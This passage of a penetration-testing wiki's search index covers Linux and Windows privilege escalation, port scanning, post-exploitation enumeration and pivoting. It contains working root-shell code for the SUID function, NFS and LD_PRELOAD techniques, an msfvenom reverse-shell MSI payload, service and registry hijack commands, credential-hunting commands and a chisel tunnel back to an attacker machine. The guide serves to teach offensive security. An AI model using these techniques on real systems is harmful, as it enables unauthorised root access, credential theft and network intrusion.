require a bit more work to be hijacked. Luckily, bash turns out to be very sophisticated and allows for the creation of functions which have the forward slash (/) character in their name. This means that we can create a malicious bash function with the same name as the absolute path we want to hijack and then our function will be invoked in lieu of the original programme. First, create the bash function: function () { cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p; } Next, export the function: export -f Finally, run the original SUID binary:","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Hijacking Absolute Paths","id":"166","title":"Hijacking Absolute Paths"},"167":{"body":"The kernel is the layer which sits between applications and the hardware. It runs with root privileges, so if it gets exploited, privileges can be escalated. Finding kernel vulnerabilities and writing exploits for them is no trifling task, however, once such a vulnerability is made public and exploit code for it is developed, it easily becomes a low-hanging fruit for escalating privileges. A very useful list of kernel exploits found to date is located here . Finding already existing exploits is really easy - just search for the Linux kernel version!","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Kernel Exploits » Introduction","id":"167","title":"Introduction"},"168":{"body":"As an example, we are going to exploit dirtyc0w. This was a very ubiquitous exploit and can still be found on numerous outdated machines. The exploit itself has many versions but for demonstration purposes we are going to use the one at https://www.exploit-db.com/exploits/40839 . We need to first verify that our kernel version is in the vulnerable range. Inside the exploit we see compilation instructions, which is typical of kernel exploits as they are usually written in C: By compiling and running the exploit (it may actually take some time to execute), we have elevated our privileges!","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Kernel Exploits » Exploiting the Kernel","id":"168","title":"Exploiting the Kernel"},"169":{"body":"It is common to see a low-privileged user to be configured to be able to run some commands via sudo without a password. Luckily, many existing programmes for Linux have advanced capabilities which allow them to do many things such as spawning a shell when run with sudo. If such a programme is configured in the aforementioned way, then there is a shell escape sequence which is a (usually) simple command/argument passed to the programme when run, so that it spawns a shell with elevated privileges when run with sudo. Naturally, these shell escape sequences are programme-specific and it would be inane to try and remember the sequence for every binary. This is where GTFOBins comes in. This is a database of commands (including shell escape sequences) for common Linux binaries which can be used for escalating privileges. We saw in the above list provided by sudo -l that we are allowed to run find as root via sudo. Let's check if there is a shell escape sequence for it. There is! We can copy and paste it, then run it with sudo, and we should at last have a root shell: Another example can be given with the awk binary, which we also saw in the list provided by sudo -l.","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Sudo Shell Escape Sequences » Introduction","id":"169","title":"Introduction"},"17":{"body":"All services which need to somehow interface with the network a host is connected to run on ports and port scanning allows us to enumerate them in order to gather information such as what service is running, which version of the service is running, OS information, etc. Warning Port scanning is very heavy on network bandwidth and generates a lot of traffic which can cause the target to slow down or crash altogether. During a penetration test, you should always inform the client when you are about to perform a port scan. Danger Port scanning without prior written permission from the target may be considered illegal in some jurisdictions. The de-facto standard port scanner is nmap , although alternatives such as masscan and RustScan do exist. Info A lot of nmap's techniques require elevated privileges, so it is advisable to always run the tool with sudo.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » Introduction","id":"17","title":"Introduction"},"170":{"body":"The compromised machine may be configured to allow certain directories to be mounted by other machines. You can enumerate such directories by running the following command on the victim machine: cat /etc/exports You can additionally verify this from your attacker machine by running: showmount -e If there is a mountable directory which is configured as no_root_squash, as is the case here, then it can be used for privilege escalation. We begin by mounting the target directory from the victim to a directory on our machine: sudo mount -o rw, vers=3 :/tmp /tmp/root_squash Now, if no_root_sqaush is configured for the mountable directory, then the root user on the attacker machine will get mirrored on the victim machine. In essence, any command run as root on the attacker machine, will also be executed as root on the victim! This can allow us to create a malicious binary in the mounted directory and set its SUID bit from the attacker machine. This action will be mirrored by the victim and we will essentially have an SUID binary on the target which is all under our control. Let's write a simple malicious C executable: #include \n#include int main()\n{ setuid(0); // Set user ID to root setgid(0); // Set group ID to root system(\"/bin/bash -i\"); // Execute bash now with elevated privileges return 0;\n} It doesn't matter if you create it on the target or the attacker machine, but you must compile it on the target machine in order to avoid library version mismatches: gcc -o nfs_exploit nfs_exploit.c Next, you want to change the ownership of the compiled binary to root on the attacker machine . Afterwards, you want to set the SUID bit on the binary, once again, from the attacker machine : sudo chown root:root nfs_exploit\nsudo chmod +s nfs_exploit Finally, execute the malicious binary on the target :","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » NFS Root Squashing » Introduction","id":"170","title":"Introduction"},"171":{"body":"Linux capabilities provide a way for splitting permissions into small units. A binary with particular capabilities can perform certain tasks with elevated privileges. If capabilities are not properly set, or if they are excessive, this may lead to privilege escalation. Binaries with capabilities may be found using the following command: getcap / -r 2>/dev/null A list of all possible capabilities can be found here . In the above example, we can see that the python interpreter can arbitrarily set the user ID of the process. This means that we can change our user ID to 0 when running python, thus escalating our privileges:","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing Linux Capabilities » Introduction","id":"171","title":"Introduction"},"172":{"body":"The LD_PRELOAD environment variable can be used to tell the dynamic linker to load specific libraries before any others. By default, programmes run with sudo will be executed in a clean, minimal environment which is specified by env_reset when running sudo -l. However, env_keep may be used to inherit some environment variables from the parent process. If LD_PRELOAD is specified together with env_keep, then we can compile our own malicious dynamic library and set LD_PRELOAD to it. Therefore, when we execute a binary with sudo, our library will be loaded before any other library and its initialisation function will be invoked with root permissions.","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Sudo Escalation via LD_PRELOAD » Introduction","id":"172","title":"Introduction"},"173":{"body":"Writing the library is a fairly simple task. All we need to do is write an _init function in a C file. This procedure will contain the code we want to be executed when the library is loaded. #include \n#include \n#include void _init()\n{ unsetenv(\"LD_PRELOAD\"); // Unset LD_PRELOAD to avoid an infinite loop setgid(0); // Set root permissions setuid(0); // Set root permissions system(\"/bin/bash\");\n} We begin by unsetting the LD_PRELOAD variable from the environment. This is to preclude an infinite loop when /bin/bash is invoked. If our library didn't unset LD_PRELOAD, then when /bin/bash is called, our library will again be loaded first and then proceed onto launching /bin/bash yet again, which will again load our library and so on. The next two lines set the user and group IDs to those of root which ensures that the next commands are run with root privileges. Finally, system is called in order to spawn a bash shell. We now need to compile this file as a shared library: gcc -fPIC -shared -o exploit.so exploit.c -nostartfiles At last, we can invoke any binary with sudo and specify the path to our library as LD_PRELOAD. Note that the path to the library must be specified as an absolute path.","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Sudo Escalation via LD_PRELOAD » Writing the Malicious Library","id":"173","title":"Writing the Malicious Library"},"174":{"body":"Once you have gained access to a system, it is paramount to look for other credentials which may be located on the system. These may be hidden in the Windows Registry, within log or configuration files, and more. Moreover, you should check to see if any credentials you have previously found work with anything else. You should also check if you have access to the Windows SYSTEM or SAM files or any of their backups, since those will contain the hashes for users on the system. If so, you might be able to perform a pass-the-hash attack or simply crack them. If the compromised system is a Windows Server, you should look for any stored credentials which can be used with RunAs. You should check the Windows build and version, see if there are any kernel exploits available. You should then move onto enumerating misconfigurations in services and other Windows-specific vectors. If none of these bear any fruit, you should look at the programmes installed on the system, enumerate them for misconfigurations, explore their versions and any exploits which may be available. If none are found, you might consider reverse engineering and binary exploitation as a last resort. Finally, if you have gained access as a local administrator, you should proceeding to looking for ways to bypass UAC . In essence: Credentials Reused Credentials Credentials in Configuration or Log files Credentials in the Windows Registry Credentials from Windows SAM and SYSTEM files Pass-the-hash attacks Stored Credentials (Windows Servers) Kernel Exploits Misconfigurations Services AutoRuns Startup Applications Scheduled Tasks AlwaysInstallElevated Group Policy Bypassing UAC","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Methodology","id":"174","title":"Methodology"},"175":{"body":"Windows Services allow for the creation of continuously running executable applications. These applications have the ability to be automatically started upon booting, they may be paused and restarted, and they lack a user interface. In order for a service to function properly, it needs to be associated with a system or user account. There are a few common built-in system accounts that are used to operate services such as LocalService, NetworkService, and LocalSystem. The following table describes the default secure access rights for accounts on a Windows system: Account Permissions Local Authenticated Users (including LocalService and Network Service) READ_CONTROL SERVICE_ENUMERATE DEPENDENTS SERVICE_INTERROGATE SERVICE_QUERY_CONFIG SERVICE_QUERY_STATUS SERVICE_USER_DEFINED_CONTROL Remote Authenticated Users Same as those for Local Authenitcated Users. LocalSystem READ_CONTROL SERVICE_ENUMERATE DEPENDENTS SERVICE_INTERROGATE SERVICE_PAUSE_CONTINUE SERVICE_QUERY_CONFIG SERVICE_QUERY_STATUS SERVICE_START SERVICE_STOP SERVICE_USER_DEFINED_CONTROL Administrators DELETE READ_CONTROL SERVICE_ALL_ACCESS WRITE_DAC WRITE_OWNER Moreover, a registry entry exists for each service in HKLM\\SYSTEM\\CurrentControlSet\\Services.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Introduction","id":"175","title":"Introduction"},"176":{"body":"In general, manual enumeration of Windows services is a rather cumbersome process, so I suggest that you use a tool for automation such as WinPEAS . winpeas.exe servicesinfo The permissions a user has on a specific service can be inspected via the AccessChk Windows Utility. acceschk.exe /accepteula -uwcqv ","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Enumeration","id":"176","title":"Enumeration"},"177":{"body":"This is a vulnerability which can be used to force a misconfigured service to execute an arbitrary programme in lieu of its intended one, as long as the path to that executable contains spaces. On its own, this does not allow for privilege escalation, but it becomes a really powerful tool when the misconfigured service is set to run with system privileges. Let's take a look at the following path: C:\\Program Files\\Vulnerable Service\\service.exe If this path was specified to the service in quotation marks, \"C:\\Program Files\\Vulnerable Service\\service.exe\", then Windows will treat it correctly, executing the service.exe file in the C:\\Program Files\\Vulnerable Service directory. However, Windows is not the sharpest tool in the box and if the path is provided without quotation marks, then it will see ambiguity in what it is supposed to execute. The path will be split at each space character - the first segment will be treated as the executable's name and the rest will be seen as command-line arguments to be passed to it. So at first, Windows will try to execute the following: C:\\Program.exe Files\\Vulnerable Service\\service.exe Once Windows determines that the C:\\Program.exe file does not exist, it will look for the next space character, treat the characters up to it as the new path and try to execute it again: C:\\Program Files\\Vulnerable.exe Service\\service.exe Now, this is process is recursive until a file is successfully executed or the end of the path has been reached. If we are able to create a malicious executable in any of the possible paths that Windows will traverse, then we can hijack the service before the intended file is found. Once you have identified a vulnerable service, you can query to confirm that the path is indeed unquoted. Let's check our access to the possible directories that will be probed by Windows: accesschk.exe /accepteula -uwdq While we cannot write within the C:\\ or C:\\Program Files directories (meaning that we cannot create C:\\Program.exe or C:\\Program Files\\Unquoted.exe), we do have write access to C:\\Program Files\\Unquoted Path Service\\. What this entails is our ability to create a Common.exe binary inside this directory and, since the initial path was unquoted, the path C:\\Program Files\\Unquoted Path Service\\Common.exe will be probed before C:\\Program Files\\Unquoted Path Service\\Common Files\\unquotedpathservice.exe and once Windows finds our malicious executable there, it will be executed with the service's permissions. If we couldn't restart the service, then we could have simply waited for something else to execute it.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Unquoted Service Paths » Unquoted Service Paths","id":"177","title":"Unquoted Service Paths"},"178":{"body":"As previously mentioned, each service is associated with a registry entry in the Windows Registry which is located at HKLM\\SYSTEM\\CurrentControlSet\\Services\\. This entry is essentially the configuration of the service and if it is writable, then it can be abused by an adversary to overwrite the path to the binary application of the service with a malicious one. Querying regsvc reveals that it is running with system privileges and its registry entry is writable by all logged-on users (NT AUTHORITY\\INTERACTIVE). All we need to do now is overwrite the ImagePath registry key in the service's entry to point to our malicious executable: reg add HKLM\\SYSTEM\\CurrentControlSet\\services\\ /v ImagePath /t REG_EXPAND_SZ /d /f Restart the service and catch the shell: net start regsvc","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Weak Registry Permissions » Weak Registry Permissions","id":"178","title":"Weak Registry Permissions"},"179":{"body":"This is a technique which leverages misconfigurations in the service permissions for a specific user. If permissions for a specific user differ from the ones described in the table here , then they may manifest as a possible vulnerability. To identify such services, it is useful to use WinPEAS. It appears that user has write access to the service daclsvc and can also start the service. We can query the service to see what user account is actually executing it: sc qc It appears that the service is running as LocalSystem which is an account with more privileges than our user account. If we can write to the service, then we can alter its configuration and change the path to the executable which is supposed to be run: sc config binpath=\"\\\"\\\"\" All we now need to do is setup a listener and run the service: net start And we get a system shell back:","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Insecure Service Permissions » Insecure Service Permissions","id":"179","title":"Insecure Service Permissions"},"18":{"body":"There are two types of ports depending on the transport-layer protocol that they support. Both TCP and UDP ports range from 0 to 65535 but they are completely separate. For example, DNS uses UDP port 53 for queries but it uses TCP port 53 for zone transfers. To scan UDP ports, nmap requires elevated privileges and the -sU flag. nmap -sU Note Due to the nature of the protocol, UDP scanning takes a lot longer than TCP does.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » TCP vs UDP","id":"18","title":"TCP vs UDP"},"180":{"body":"The binary application executed by a service is considered insecure when an adversary has write access to it when they shouldn't. This means that an attacker can simply replace the file with a malicious executable. If the service is configured to run with system privileges, then those privileges will be inherited by the attacker's executable! All we need to do is simply replace the legitimate executable with a malicious one and then start the service.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Insecure Service Executable Permissions » Introduction","id":"180","title":"Introduction"},"181":{"body":"AutoRun application are programmes which have been set up to automatically execute when a user logs in for the first time after booting the system. This is typically done so that the application can look for updates and update itself if necessary. For example, Steam, Spotify, and Discord, all set this up upon installation. On its own, this does not pose a security risk. Where the real vulnerabilities lies is within AutoRuns which are writable by anyone. AutoRuns can be enumerated by querying the registry: reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run Now all we need to do is generate the malicious executable and replace the AutoRun programme with it. Note that in order for the exploit to work, an administrator would need to log in. Now, as soon as the administrator logs in, we will get an elevated shell.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » AutoRun Programmes » Introduction","id":"181","title":"Introduction"},"182":{"body":"Windows has a group policy which, when enabled, allows a user to install a Microsoft Windows Installer Package (.msi file) with elevated privileges. This poses a security risk because an adversary can simply generate a malicious .msi file and execute it with admin privileges. In order to check for this vulnerability, one need only query the following registry keys: reg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated\nreg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated The AlwaysInstallElevated policy appears enabled, so we can generate a malicious .msi executable. One way to do this is through Metasploit: msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f msi -o reverse.msi Next, transfer the executable to the target machine and execute it with msiexec: msiexec /quiet /qn /i ","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » AlwaysInstallElevated Group Policy » Introduction","id":"182","title":"Introduction"},"183":{"body":"Kernel exploits are one of the most trivial privilege escalation paths available. One of the first things you should do when seeking for a privilege escalation vector is to look at the kernel version as well as any installed patches and determine if it is vulnerable to a known kernel exploit. Plenty of exploits can be found just by searching up the kernel version, but a cheat sheet which I like can be found here . Naturally, the exploitation of a kernel exploit is highly specific on a case-by-case basis. Once you have identified that the system is vulnerable to a known kernel exploit, you will need to find the exploit code.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Kernel Exploits » Introduction","id":"183","title":"Introduction"},"184":{"body":"Windows Scheduled Tasks allow for the periodic execution of scripts. These can be manually enumerated via the following command: schtasks /query /fo LIST /v A scheduled task is of interest when it is executed with elevated privileges but we have write access to the script it executes. This script is fairly simple, so we can just append a line to it which executes a malicious executable. When the time for the scheduled task comes, we will catch an elevated shell.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Scheduled Tasks » Introduction","id":"184","title":"Introduction"},"185":{"body":"User Account Control (UAC) is a security measure introduced in Windows Vista which aims to prevent unauthorised changes to the operating system. It ensures that any such changes require the assent of the administrator or a user who is part of the local administrators group. Administrative privileges in Windows are a bit different from those in Linux. Even if an adversary manages to execute some code from an administrator account, this code will not run with elevated privileges, unless it was \"run as Administrator\"-ed. When an unprivileged user attempts to run a programme as administrator, they will be prompted by UAC to enter the administrator's password. However, if the user is privileged (they are an administrator), they will still be prompted with the same UAC prompt, but it will ask them for consent in lieu of a password. Essentially, an administrative user will need to click \"Yes\" instead of typing their password. What is described so far is the default behaviour. UAC, however, has different protection levels which can be configured. Now there are 3 (two of the options are the same but with different aesthetics) options. The first option, and the most strict, is Always Notify. If UAC is set to this, then any programme which tries to run with elevated privileges will beget a UAC prompt - including Windows built-in ones. Next is the default setting - Notify me when application try to make changes to my computer. Under this configuration, regular applications will still cause a UAC prompt to show up whenever run as administrator, however, Windows built-in programmes can be run with elevated privileges without such a prompt. Following is another option which is the exact same as this one, but the UAC prompt will not dim the screen. This is useful for computers for which dimming the screen is not exactly a trifling task. Finally, the Never Notify means that a UAC prompt will never be spawned no matter who is trying to run the application with elevated privileges. UAC can be bypassed if an adversary already has access to a user account which is part of the local administrators group and UAC is configured to the default setting.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Bypassing UAC » Introduction","id":"185","title":"Introduction"},"186":{"body":"There are many tools for bypassing UAC and which one is to be used depends on the Windows build and version. One such tool which has lots of methods for bypassing UAC is UACMe . You will need to build it from source using Visual Studio, meaning that you will need a Windows machine in order to compile it.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Bypassing UAC » Bypassing UAC","id":"186","title":"Bypassing UAC"},"187":{"body":"Windows Startup applications are very similar to AutoRun Programmes , however, they are executed every time a user logs in. If we can write to the Startups directory, then we can place a malicious executable there which will be executed upon the next login. If the next user to log in is an administrator, then we will gain elevated privileges. To check for write access to the Startups directory, we can use accesschk: C:\\PrivEsc\\accesschk.exe /accepteula -d \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\" All we need to do is place a malicious executable in the directory and wait for an admin to log in.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Startup Applications » Introduction","id":"187","title":"Introduction"},"188":{"body":"Windows Servers have capabilities to store credentials using a built-in utility called cmdkey . On its own, cmdkey is rather useless to an adversary - you can only really use it to list what credentials are stored but not actually reveal them. cmdkey /list The real deal is another built-in utility called Runas . It allows one user to execute a binary with the permissions of another and, what is essential here, this can be achieved with only stored credentials. One doesn't even need to know what the credentials are - so long as a user has their credentials stored, then they can be used to execute programmes as that user. runas /savedcred /user: ","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Stored Credentials » Introduction","id":"188","title":"Introduction"},"189":{"body":"Windows Access Tokens are objects which describe the security context in which a thread or process is run. The information within an access token identifies the user and their privileges of said process or thread. Upon each successful user log-on, an access token for the user is generated and every process executed by this user will contain a copy of this token called the primary token . This token is used by the system to inspect the privileges of the process when the process tries to interact with something which may require certain privileges. However, threads of the process are allowed to use a second token, called an impersonation token , to interact with objects as if they had a different security context and different privileges. This is only allowed when the process has the SeImpersonatePrivilege. As with UAC bypassing , exploiting token impersonation is highly dependent on the Windows build and version. However, the most infamous exploits are the Potato exploits .","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Token Impersonation » Introduction","id":"189","title":"Introduction"},"19":{"body":"When scanning, nmap will determine that a port is in one of the following states: open - an application is actively listening for TCP connections, UDP datagrams or SCTP associations on this port closed - the port is accessible (it receives and responds to Nmap probe packets), but there is no application listening on it filtered - Nmap cannot determine whether the port is open because packet filtering prevents its probes from reaching the port. Usually, the filter sends no response, so Nmap needs to resend the probe a few times in order to be sure that it wasn't dropped due to traffic congestion. This slows the scan drastically unfiltered - the port is accessible, but Nmap is unable to determine whether it is open or closed. Only the ACK scan, used for mapping firewall rulesets, may put ports in this state open|filtered - Nmap is unable to determine whether the port is open or filtered. This occurs for scan types in which open ports give no response closed|filtered - Nmap is unable to determine whether the port is closed or filtered. It is only used for the IP ID idle scan. By default, nmap scans only the 1000 most common TCP ports. One can scan specific ports by listing them separated by commas directly after the -p flag. nmap -pport1,port2,... If no ports are specified after the -p flag, nmap will scan all ports (either UDP or TCP depending on the type of scan). nmap -p ","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » Port States","id":"19","title":"Port States"},"190":{"body":"","breadcrumbs":"Post Exploitation » Enumeration","id":"190","title":"Post Exploitation"},"191":{"body":"There are plenty of tools which can be used for automating post-exploitation enumeration on Linux machines.","breadcrumbs":"Post Exploitation » Enumeration » Linux » Introduction","id":"191","title":"Introduction"},"192":{"body":"LinPEAS is an amazing tool for automation enumeration. It is written in Bash which means that it requires no additional dependencies and can be freely run. In order to acquire the latest version of LinPEAS, run the following command: wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh By default, running LinPEAS will perform many checks on the system and spit out a deluge of information. However, the tool can also be used to only perform specific tasks using the -o argument. Enumerate system information: ./linpeas.sh -o system_information Enumerate containers on the machine: ./linpeas.sh -o container Enumerate cloud platforms: ./linpeas.sh -o cloud Enumerate available software: ./linpeas.sh -o software_information Enumerate processes, cronjobs, services, and sockets: ./linpeas.sh -o procs_crons_timers_srvcs_sockets Enumerate network information: ./linpeas.sh -o network_information Enumerate user information: ./linpeas.sh -o users_information Enumerate interesting files: ./linpeas.sh -o interesting_files","breadcrumbs":"Post Exploitation » Enumeration » Linux » Linux Enumeration with LinPEAS","id":"192","title":"Linux Enumeration with LinPEAS"},"193":{"body":"Find all files in a directory which contain \"pass\" or \"password\", ignoring case: grep --color=auto -rnw '' -ie \"password\\|pass\" --color=always 2>/dev/null Find all files in a directory which contain \"pass\" or \"password\" in their name, ignoring case: find / -name \"*pass*\" 2>/dev/null","breadcrumbs":"Post Exploitation » Enumeration » Linux » Hunting Down Sensitive Files » Finding Files Containing Passwords","id":"193","title":"Finding Files Containing Passwords"},"194":{"body":"find / -name id_rsa 2>/dev/null","breadcrumbs":"Post Exploitation » Enumeration » Linux » Hunting Down Sensitive Files » Finding SSH Keys","id":"194","title":"Finding SSH Keys"},"195":{"body":"System enumeration is a crucial, typically first, step in the enumeration phase of post-exploitation.","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Introduction","id":"195","title":"Introduction"},"196":{"body":"cat /etc/issue","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Enumerating the Distribution Version","id":"196","title":"Enumerating the Distribution Version"},"197":{"body":"uname -a cat /proc/version","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Enumerating Linux Kernel Version Information","id":"197","title":"Enumerating Linux Kernel Version Information"},"198":{"body":"lscpu","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Enumerating CPU Architecture","id":"198","title":"Enumerating CPU Architecture"},"199":{"body":"ps aux","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Enumerating Running Services","id":"199","title":"Enumerating Running Services"},"2":{"body":"You should only make changes inside the eight category folders under the Notes/ directory. Minor edits to already existing content outside of the aforementioned allowed directories are permitted as long as they do not bring any semantic change - for example fixing typos.","breadcrumbs":"Cyberclopaedia » Contributing » In-Scope","id":"2","title":"In-Scope"},"20":{"body":"This is the type of scan which nmap defaults to when run with elevated privileges and is also also referred to as a \"stealth scan\". Nmap sends a SYN packet to the target, initiating a TCP connection. The target responds with SYN ACK, telling Nmap that the port is accessible. Finally, Nmap terminates the connection before it's finished by issuing an RST packet. This type of scan can also be specified using the -sS option. Note Despite its moniker, a SYN scan is no longer considered \"stealthy\" and is quite easily detected nowadays.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » SYN Scan » SYN Scan","id":"20","title":"SYN Scan"},"200":{"body":"List files owned by a certain user in a directory: find -user 2>/dev/null List files owned by a certain user in a directory (without /proc): find -user 2>/dev/null | grep -v \"/proc\" List files owned by a certain group in a directory: find -group 2>/dev/null find -group 2>/dev/null | grep -v \"/proc\" # ignore /proc","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » File System Enumeration","id":"200","title":"File System Enumeration"},"201":{"body":"whoami id","breadcrumbs":"Post Exploitation » Enumeration » Linux » User Enumeration » Enumerate User Name and Group","id":"201","title":"Enumerate User Name and Group"},"202":{"body":"sudo -l","breadcrumbs":"Post Exploitation » Enumeration » Linux » User Enumeration » Enumerate Commands Runnable as Root","id":"202","title":"Enumerate Commands Runnable as Root"},"203":{"body":"cat /etc/passwd","breadcrumbs":"Post Exploitation » Enumeration » Linux » User Enumeration » List Users on the Machine","id":"203","title":"List Users on the Machine"},"204":{"body":"history","breadcrumbs":"Post Exploitation » Enumeration » Linux » User Enumeration » Get History of Commands the User Has Run","id":"204","title":"Get History of Commands the User Has Run"},"205":{"body":"Get a list of the network interfaces connected to the machine with their IPs and MACs: ip a Get a list of the machines that the victim has been interacting with (print the ARP table): ip neigh","breadcrumbs":"Post Exploitation » Enumeration » Linux » Network Enumeration » List Network Interfaces and Network Information","id":"205","title":"List Network Interfaces and Network Information"},"206":{"body":"netstat -ano","breadcrumbs":"Post Exploitation » Enumeration » Linux » Network Enumeration » List Open Ports","id":"206","title":"List Open Ports"},"207":{"body":"Plenty of automated tools can be found for enumerating Windows machines. They are a bit more diverse than those available for Linux - there are precompiled binaries (.exes) available, but there are also PowerShell scripts and many more.","breadcrumbs":"Post Exploitation » Enumeration » Windows » Introduction","id":"207","title":"Introduction"},"208":{"body":"WinPEAS is an incredible tool for enumerating Windows machines. It comes in two flavours - .bat and .exe. It doesn't really matter which one you are going to run - both will do the job just fine - however, the .exe file requires .Net version 4.5.2 or later to be installed on the machine. Enumerating system information: winpeas.exe systeminfo","breadcrumbs":"Post Exploitation » Enumeration » Windows » Windows Enumeration with WinPEAS","id":"208","title":"Windows Enumeration with WinPEAS"},"209":{"body":"systeminfo","breadcrumbs":"Post Exploitation » Enumeration » Windows » System Enumeration » Enumerate System Information","id":"209","title":"Enumerate System Information"},"21":{"body":"This is the default scan for nmap when it does not have elevated privileges. It initiates a full TCP connection and as a result can be slower. Additionally, it is also logged at the application level. This type of scan can also be specified via the -sT option.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » TCP Connect Scan » TCP Connect Scan","id":"21","title":"TCP Connect Scan"},"210":{"body":"wmic qfe","breadcrumbs":"Post Exploitation » Enumeration » Windows » System Enumeration » Enumerate Patches","id":"210","title":"Enumerate Patches"},"211":{"body":"wmic logicaldisk get caption,description,providername","breadcrumbs":"Post Exploitation » Enumeration » Windows » System Enumeration » Enumerate Drives","id":"211","title":"Enumerate Drives"},"212":{"body":"Pivoting is the act of establishing access to internal resources on a network through a compromised machine. This allows an adversary to exifltrate local data which is usually not accessible from the outside world. Moreover, it permits the use of hacking tools as if they were running from inside the network.","breadcrumbs":"Post Exploitation » Pivoting » Introduction","id":"212","title":"Introduction"},"213":{"body":"Chisel is an open-source application for port tunneling. You can get it from https://github.com/jpillora/chisel. Clone the repo and follow the installation instructions. In order to port tunnel with chisel, you need to have a copy of the binary on both the attacking and the compromised machines.","breadcrumbs":"Post Exploitation » Pivoting » Tunneling with Chisel » Introduction","id":"213","title":"Introduction"},"214":{"body":"Run the following command on the attacking machine: chisel server -p [Listen Port] --reverse & This will setup a chisel server on Listen Port. On the compromised systenm run: chisel client [Attacker IP]:[Listen Port] R:[Local Host]:[Local Port]:[Remote Host]:[Remote Port] & This will endeavour to connect to a chisel server at the specified Attacker IP and Listen Port. Once it has connected to the remote chisel server, the chisel server will open Remote Port on the Remote Host and tunnel it to the Local Port of Local Host. From now on, any traffic sent to Remote Port on the Remote Host will be forwarded to the Local Port of Local Host. Chisel also defines some defaults for these values, which means you can omit some of them: Local Host - 0.0.0.0 Remote Host - 0.0.0.0 (server localhost) As an example, suppose you start a chisel server on your attacking machine (10.10.10.189) on port 1337, and want to gain access to port 3306 on the compromised machine. On the attacking machine you run: chisel server -p 1337 --reverse & On the compromised system you will run: chisel client 10.10.10.189:1337 R:localhost:3306:localhost:31337 & The above basically translates to \"Forward any traffic intended for port 31337 localhost on my attacking machine to port 3306 on the localhost of the compromised system\".","breadcrumbs":"Post Exploitation » Pivoting » Tunneling with Chisel » Creating a reverse tunnel","id":"214","title":"Creating a reverse tunnel"},"215":{"body":"SSH Tunneling is a port forwarding technique which uses SSH. It can be used to access internal resources within a network if you have SSH access to a host inside it. Additionally, the tunnel goes through a pre-existing SSH connection and can thus be utilised for bypassing firewalls.","breadcrumbs":"Post Exploitation » Pivoting » SSH Tunneling » Introduction","id":"215","title":"Introduction"},"216":{"body":"Local port forwarding is used when you want to create a bridge to a port that hosts an internal service which does not accept connections from outside the network. For this to work, you need to specify two ports - one for the service on the remote machine which you want to access and one on your local machine to create the listener on. Any packets sent to your machine on the local port will be tunneled to the port on the remote machine through the SSH connection. Whilst you will still receive any responses to requests you send through the tunnel, you won't be able to receive arbitrary data that gets sent to the remote port. The syntax is fairly simple: ssh -L [LOCAL_IP:]LOCAL_PORT:DESTINATION:DESTINATION_PORT SSH_SERVER [LOCAL_IP:] - the interface you want to open the listener on. This can be omitted and defaults to localhost. LOCAL_PORT - the port you want to start the listener on. Any traffic sent to this port will be forwarded through the tunnel. DESTINATION - the destination host. This does not need to (and most likely won't) match SSH_SERVER, since you are now trying to access an internal resource. DESTINATION_PORT - the port on the remote machine, that you want to access through the tunnel. You can also add -N -f to the above command, so that ssh runs in the background and only opens the tunnel without giving an interface for typing commands. We have now established a tunnel on my Kali machine's port 8080, which will forward any traffic to 192.168.129.137:1337, which is my ubuntu server. So let's see if we can access the web page. Wait, what? We just created the tunnel, but it does not seem to work? Well, remember how the DESTINATION does not need to match the server's IP? This is because the DESTINATION is where the traffic is sent after it gets to the remote machine. In a sense, the remote machine is now the sender and not us. Therefore, in order to access a resource internal to the network, we would need to change DESTINATION to something like localhost or another computer's IP. Let's again check to see if we have access to the resource hidden behind localhost:1337 on the Ubuntu server...","breadcrumbs":"Post Exploitation » Pivoting » SSH Tunneling » Local Port Forwarding","id":"216","title":"Local Port Forwarding"},"217":{"body":"Remote port forwarding is sort of the reverse of local port forwarding. A tunnel is opened and any traffic sent to the tunnel port on the remote machine will be forwarded to the local machine. In the exact same way as above, once the traffic is tunneled, the local machine becomes the sender. Therefore, remote port forwarding 